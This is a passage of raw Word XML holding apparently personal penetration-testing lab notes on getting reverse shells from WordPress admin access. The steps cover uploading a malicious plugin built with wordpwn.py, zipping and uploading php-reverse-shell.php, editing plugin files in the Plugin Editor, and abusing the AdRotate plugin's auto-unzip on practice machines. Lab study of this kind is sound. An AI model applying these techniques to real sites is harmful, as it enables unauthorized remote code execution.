    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To upload the malicious plug-in, instead of creating a zip folder with a reverse shell manually, they used this tool that is specifically for creating malicious wordpress plugins. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1445"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId977">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/wetw0rk/malicious-wordpress-plugin/tree/master?tab=readme-ov-file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1445"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, this does use a meterpeter shell, which has limited usage in XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1445"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wordpwn.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D90">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:hyperlink r:id="rId978">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetMidnight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, in the Plugins section, you might see an "Add new" section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="243" name="image237.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image237.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId979"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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2D93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on the "Upload Plugins" button</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="227" name="image218.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image218.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId980"/>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2D95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here, you can try uploading a regular reverse shell (not zipped) and see if it accepts it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it expects a zipped file, we can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip -r php-reverse-shell.php.zip php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then upload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php-reverse-shell.php.zip </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and hope it unzips the file by itself</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D99">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now, to active it, we have to go to a certain directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /wp-content/uploads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For me, I see 2025 directory and then a 07 directory since it's 7/10/2025 for me</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/wp-content/uploads/2025/07/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From there, I click on my reverse shell to activate it</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rsoc1dyuos79" w:id="401"/>
      <w:bookmarkEnd w:id="401"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell with Admin Privileges using "Plugin Editor" button for plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId981">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Shenzi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1405"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once logged in we can attempt to gain a reverse shell by editing a plugin with the "Plugin Editor" and replacing any .php file with our reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1405"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then accessing the plugin at http://192.168.158.55/shenzi/wp-content/plugins/&lt;plugin name&gt;/&lt;edited.php&gt;/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7wdafu14epyl" w:id="402"/>
      <w:bookmarkEnd w:id="402"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell with Admin Privileges using AdRotate Plugin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In a previous section, we learned how to get rev shell using the "Editor" and copy and pasting a reverse shell into the website code. But, sometimes, there isn't an "editor," so we can't edit the web page source code. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId982">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Loly</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we had to abuse the AdRotate Plugin to upload a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3467100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="415" name="image412.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image412.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId983"/>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2DAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the "Plugins" section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The AdRotate plugin looks interesting, it allows us to upload zip files. The last time I used this, the zip files were automatically getting unzipped after upload. We find the same behavior on this website. We upload our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php-reverse-shell.zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and get the reverse-shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip -r php-reverse-shell.php.zip php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="317" name="image302.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image302.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
